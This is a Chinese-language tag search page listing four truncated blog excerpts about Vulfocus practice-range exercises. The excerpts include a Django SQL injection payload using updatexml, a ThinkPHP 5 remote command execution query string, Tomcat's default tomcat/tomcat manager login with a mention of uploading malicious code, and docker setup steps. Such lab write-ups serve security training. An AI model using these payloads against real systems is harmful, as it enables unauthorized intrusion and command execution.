搜索结果
查询Tags标签: vulfocus,共有 4条记录-
Vulfocus靶场 | Django SQL注入(CVE-2021-35042)
漏洞复现 这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\ 直接按照提示,进入了Django报错页面 flag就在里面,直接ctrl+F就能找到 爆数据库版本 order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%2…
2022/8/22 2:24:03 人评论 次浏览 -
Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)
tp5的经典漏洞 遇到tp5漏洞直接拿poc打就行 漏洞利用 1,利用system函数远程命令执行 Payload如下: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls2,查看phpinfo payload:如下 ?s=index/think\app/invoke…
2022/8/11 14:24:52 人评论 次浏览 -
Vulfocus靶场 | tomcat-pass-getshell 弱口令
漏洞原理在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令。 使用工具对其进行穷举,得到密码后,也可以进行后台上传恶意代码控制服务器。 环境kali vulhub 靶场 /tomcat/tomcat8漏洞复现访问登录口:htt…
2022/8/8 5:23:07 人评论 次浏览 -
tomcat文件解析漏洞
环境搭建 安装运行docker git clone https://github.com/vulhub/vulhub.git yum -y install docker-compose 拉取vulfocus镜像 docker pull vulfocus/vulfocus:latest 运行vulfocus镜像 docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=…
2022/2/25 6:30:46 人评论 次浏览
